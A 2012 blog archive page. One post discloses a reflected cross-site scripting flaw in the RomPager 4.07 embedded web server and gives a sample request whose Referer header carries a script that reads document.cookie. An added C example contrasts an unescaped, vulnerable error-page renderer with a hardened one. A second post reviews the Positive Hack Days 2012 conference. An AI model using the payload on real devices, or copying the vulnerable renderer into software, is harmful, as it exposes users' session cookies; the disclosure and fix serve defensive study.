Monthly Archives: June 2012

RomPager 4.07 cross-site scripting vulnerability

While testing IP addresses that were sources of attacks on the php-cgi vulnerability discovered by eindbazen (CVE-2012-1823), I accidentally found an XSS in the handling of the Referer header in the RomPager/4.07 embedded web server.

GET http://IP.IP.IP.IP/s0urc3_that_not_exists HTTP/1.1

..

Referer: http://dtls.com/"><script>alert(document.cookie)</script>
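
The following is an added example, not RomPager's code and not part of the original post: a C sketch of an error-page renderer that reflects the Referer value unescaped, next to a hardened version. The 404 template, the function names and the assumption that the header ends up inside a link are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical 404 template (assumption): Referer becomes a "back" link. */
#define PAGE_FMT "<p>Not found. <a href=\"%s\">Return to last page</a></p>"

/* Escape characters that can close an attribute or open a tag.
   Returns 0 on success, -1 if the result does not fit in out. */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= outsz) return -1;   /* never emit a truncated value */
        if (rep) memcpy(out + o, rep, n); else out[o] = *in;
        o += n;
    }
    out[o] = '\0';
    return 0;
}

/* Vulnerable form: the header value is copied into the markup verbatim. */
int render_404_raw(const char *referer, char *page, size_t pagesz)
{
    int n = snprintf(page, pagesz, PAGE_FMT, referer);
    return (n < 0 || (size_t)n >= pagesz) ? -1 : 0;
}

/* Hardened form: http(s) URLs only, escaped; anything else becomes "/". */
int render_404_safe(const char *referer, char *page, size_t pagesz)
{
    char esc[512];
    if (strncmp(referer, "http://", 7) && strncmp(referer, "https://", 8))
        referer = "/";
    if (html_escape(referer, esc, sizeof esc) != 0)
        strcpy(esc, "/");
    int n = snprintf(page, pagesz, PAGE_FMT, esc);
    return (n < 0 || (size_t)n >= pagesz) ? -1 : 0;
}
```

With the Referer value from the request above, render_404_raw leaves the script element intact in the page, while render_404_safe emits it as inert text inside the href attribute.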


Positive Hack Days 2012

!!! This is a sponsored article !!!

Pros and cons of the phdays 2012 conference by Positive Technologies.

(+)

– big place;

– serious teams;

– working staff;

– good level and wide range of tasks at CTF;

– lots of possibilities to communicate with real guys (visitors, speakers, participants);

– good materials from speakers (50%);

– good conditions for speakers;

– very good translation of the talks;

– 0day from LeetMore team (the proof is needed!);

– ATM hacking and dumpster diving looked very exciting.

(-)

They exist. No way to say. Thanks to those who always listen only to themselves.

PS Thanks a lot to all the guys from the CTF teams (esp. Shell-Storm, 0daysober, C.o.P, PPP, int3pids, HackerDom)

Good photos of phdays are also located here

Participants were amazed by the abundance of open Wi-Fi access points in Russia :)